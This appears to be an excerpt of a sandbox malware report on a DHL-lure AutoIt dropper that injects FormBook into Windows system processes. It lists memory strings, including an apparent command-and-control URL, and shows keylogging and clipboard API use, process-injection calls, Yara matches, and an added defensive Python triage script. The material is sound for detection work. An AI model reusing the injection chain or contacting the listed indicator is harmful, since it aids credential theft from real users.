            Source: netbtugc.exe, 00000004.00000002.3800906061.000000000283F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000004.00000002.3800906061.000000000283F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
            Source: netbtugc.exe, 00000004.00000002.3800906061.000000000281B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033l
            Source: netbtugc.exe, 00000004.00000002.3800906061.000000000283F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: netbtugc.exe, 00000004.00000002.3800906061.000000000283F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 00000004.00000002.3800906061.000000000284E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000004.00000003.1727322738.000000000753E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000004.00000002.3807603495.000000000490A000.00000004.10000000.00040000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000006.00000002.3805604147.000000000471A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.empowermedeco.com/fo8o/?LzY4r=mxnR
            Source: netbtugc.exe, 00000004.00000003.1727322738.000000000753E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: netbtugc.exe, 00000004.00000002.3812272945.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3807603495.0000000003F9E000.00000004.10000000.00040000.00000000.sdmp, FBboLdkGSWBoDSVHPM.exe, 00000006.00000002.3805604147.0000000003DAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
            Source: FBboLdkGSWBoDSVHPM.exe, 00000006.00000002.3805604147.0000000003DAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C74164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00C74164
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C73F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00C73F66
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C6001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00C6001C
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: 0_2_00C8CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00C8CABC

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.1535088491.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3799070452.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3800835213.00000000027B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3803911358.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3807715876.0000000005620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1535865703.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3803937140.0000000004B20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1535411168.0000000003880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1535088491.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3799070452.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3800835213.00000000027B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3803911358.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3807715876.0000000005620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1535865703.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3803937140.0000000004B20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1535411168.0000000003880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
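            The same eight memory dumps match Windows_Trojan_Formbook_1112e116 under both headings, and the dump name itself says where each hit landed. The Python below is an added example, not part of the Joe Sandbox report: it parses the .sdmp names listed above and keeps the hits that sit in executable memory not backed by a mapped image, which is the footprint of injected code (the RWX region at 0x400000 in svchost.exe, process 2, is also what the report carved as 2.2.svchost.exe.400000.0.unpack; the 0x27B0000 and 0x29C0000 regions in netbtugc.exe are read-write heap and drop out). The field layout is inferred from the values on this page (fifth field a Win32 PAGE_* protection, seventh a MEM_* type) and the report does not document it, so treat that mapping as an assumption.

```python
"""Rank a Joe Sandbox report's Yara hits by the memory region they landed in.
Added example, not part of the report; the .sdmp field layout is inferred."""
import re

# Assumed layout of a Joe Sandbox memory-dump name (not documented on the page):
#   <proc>.<snapshot>.<dump id>.<base address>.<protect>.<flags>.<type>.<extra>.sdmp
# <protect> read as a Win32 PAGE_* constant and <type> as a MEM_* constant is consistent
# with every value on this page: 0x40 = PAGE_EXECUTE_READWRITE, 0x04 = PAGE_READWRITE,
# 0x02 = PAGE_READONLY; 0x1000000 = MEM_IMAGE, 0x20000 = MEM_PRIVATE, 0x40000 = MEM_MAPPED.
_SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<snap>[0-9A-Fa-f]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<flags>[0-9A-Fa-f]{8})\."
    r"(?P<type>[0-9A-Fa-f]{8})\.(?P<extra>[0-9A-Fa-f]{8})\.sdmp$")

PAGE_EXECUTE_MASK = 0xF0   # PAGE_EXECUTE (0x10) .. PAGE_EXECUTE_WRITECOPY (0x80)
MEM_IMAGE = 0x1000000


def parse_sdmp(name):
    """Split a dump name into process index, base address, protection and type."""
    m = _SDMP_RE.match(name)
    if not m:
        raise ValueError("not an .sdmp name: %r" % name)
    return {
        "proc": int(m["proc"], 16),
        "base": int(m["base"], 16),
        "protect": int(m["protect"], 16),
        "type": int(m["type"], 16),
    }


def is_unbacked_executable(region):
    """Executable memory that is not a mapped image: where injected code lives."""
    return bool(region["protect"] & PAGE_EXECUTE_MASK) and region["type"] != MEM_IMAGE


def triage(yara_sources):
    """Return (proc, base, protect, type) for each Yara hit inside unbacked executable
    memory. A hit at the usual image base 0x400000 is listed first: in a system process
    that is a replaced image, not a transient buffer."""
    hits = []
    for src in yara_sources:
        name = src.split(",")[0].strip()
        if not name.endswith(".sdmp"):
            continue   # UNPACKEDPE sources are carved files, not memory regions
        region = parse_sdmp(name)
        if is_unbacked_executable(region):
            hits.append((region["proc"], region["base"], region["protect"], region["type"]))
    hits.sort(key=lambda h: (h[1] != 0x400000, h[0], h[1]))
    return hits


# The Yara match sources listed in this report (copied verbatim).
YARA_SOURCES = [
    "2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE",
    "2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE",
    "00000002.00000002.1535088491.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY",
    "00000004.00000002.3799070452.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY",
    "00000004.00000002.3800835213.00000000027B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY",
    "00000004.00000002.3803911358.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY",
    "00000006.00000002.3807715876.0000000005620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY",
    "00000002.00000002.1535865703.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY",
    "00000003.00000002.3803937140.0000000004B20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY",
    "00000002.00000002.1535411168.0000000003880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY",
]

if __name__ == "__main__":
    for proc, base, protect, mem_type in triage(YARA_SOURCES):
        print("process %d base 0x%08X protect 0x%02X type 0x%X" % (proc, base, protect, mem_type))
```

            The same filter is what a live-response script applies to VirtualQueryEx output: executable, not MEM_IMAGE, in a process that has no business holding a second PE, then scan that region with the rule. Read-write hits are still worth a look (the FormBook configuration is decrypted into heap) but they are not where the code runs.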
            Source: C:\Users\user\Desktop\DHL 30312052024.exeCode function: This is a third-party compiled AutoIt script.0_2_00C03B3A
            Source: DHL 30312052024.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: DHL 30312052024.exe, 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_4013af4b-4
            Source: DHL 30312052024.exe, 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_86fb4270-d
            Source: DHL 30312052024.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_7a06a751-c
            Source: DHL 30312052024.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_d0e67e43-e
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042B363 NtClose,2_2_0042B363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72B60 NtClose,LdrInitializeThunk,2_2_03A72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03A72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03A72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A735C0 NtCreateMutant,LdrInitializeThunk,2_2_03A735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A74340 NtSetContextThread,2_2_03A74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A74650 NtSuspendThread,2_2_03A74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72BA0 NtEnumerateValueKey,2_2_03A72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72B80 NtQueryInformationFile,2_2_03A72B80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72BE0 NtQueryValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72BF0 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72AF0 NtWriteFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72AD0 NtReadFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72FA0 NtQuerySection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72FB0 NtResumeThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72FE0 NtCreateFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72F30 NtCreateSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72E80 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72EE0 NtQueueApcThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72DD0 NtDelayExecution
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72D30 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72D10 NtMapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72CA0 NtQueryInformationToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A72C60 NtCreateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A73090 NtSetValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A73010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A739B0 NtGetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A73D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A73D70 NtOpenThread
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E24340 NtSetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E24650 NtSuspendThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E22AF0 NtWriteFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E22AD0 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E22BE0 NtQueryValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E22BF0 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E22BA0 NtEnumerateValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E22B60 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E22EE0 NtQueueApcThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E22E80 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E22FE0 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E22FB0 NtResumeThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E22F30 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E22CA0 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E22C60 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E22C70 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E22DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E22DD0 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E22D30 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E22D10 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E235C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E239B0 NtGetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E22AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E22B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E22EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E22E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E22FA0 NtQuerySection
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E22F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E22F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E22CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E22CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E22C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E22DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E22D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E23090 NtSetValueKey
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E23010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E23D70 NtOpenThread
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02E23D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_00627920 NtCreateFile
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_00627A70 NtReadFile
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_00627B50 NtDeleteFile
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_00627BE0 NtClose
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_00627D30 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C6A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C58310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C0E6A0
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C2D975
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C0FCE0
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C221C5
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C362D2
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C803DA
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C3242E
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C225FA
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C166E1
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C5E616
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C3878F
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C68889
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C36844
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C80857
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C18808
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C2CB21
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C36DB6
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C16F9E
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C13030
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C2F1D9
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C23187
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C01287
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C21484
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C15520
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C27696
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C15760
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C21978
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C39AB5
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C87DDB
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C21D90
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C2BDA6
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C13FE0
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C0DF00
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_013ED440
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00416871
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00416873
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004028A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00410173
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401110
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040E1F3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401290
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00403500
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040268A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402698
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004026A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040FF4A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042D753
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040FF53
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A4E3F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B003E6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AFA352
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC02C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AE0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF41A2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B001AA
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF81CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A30100
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ADA118
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AC8158
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AD2000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A3C7C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A40770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A64750
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A5C6E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B00591
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A40535
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AEE4F6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AE4420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF2446
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AF6BD7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AFAB40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A3EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B0A9A6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A56962
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A268B8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A6E8F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A4A840
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A42840
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03ABEFA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A4CFE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A32FC8
